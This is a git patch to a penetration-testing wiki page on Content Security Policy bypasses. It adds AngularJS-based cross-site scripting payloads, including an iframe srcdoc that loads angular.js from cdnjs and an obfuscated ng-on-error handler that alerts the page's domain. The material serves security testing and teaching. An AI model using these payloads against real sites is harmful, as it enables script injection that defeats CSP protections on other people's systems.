From 5878927e2c2aa24a16964ffb9288e4da286d24a1 Mon Sep 17 00:00:00 2001
From: CPol <carlospolop@gmail.com>
Date: Mon, 2 Jan 2023 20:46:21 +0000
Subject: [PATCH] GitBook: [#3729] No subject

---
 .../content-security-policy-csp-bypass/README.md         | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/pentesting-web/content-security-policy-csp-bypass/README.md b/pentesting-web/content-security-policy-csp-bypass/README.md
index 334cb0034..26ebee8bc 100644
--- a/pentesting-web/content-security-policy-csp-bypass/README.md
+++ b/pentesting-web/content-security-policy-csp-bypass/README.md
@@ -194,6 +194,15 @@ Load a vulnerable version of angular and execute arbitrary JS:
 
 "><script src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
 <div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>
+
+
+With some bypasses from: https://blog.huli.tw/2022/08/29/en/intigriti-0822-xss-author-writeup/
+<script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
+<iframe/ng-app/ng-csp/srcdoc="
+  <script/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
+  </script>
+  <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
+>
 ```
 
 #### Payloads using Angular + a library with functions that return the `window` object ([check out this post](https://blog.huli.tw/2022/09/01/en/angularjs-csp-bypass-cdnjs/)):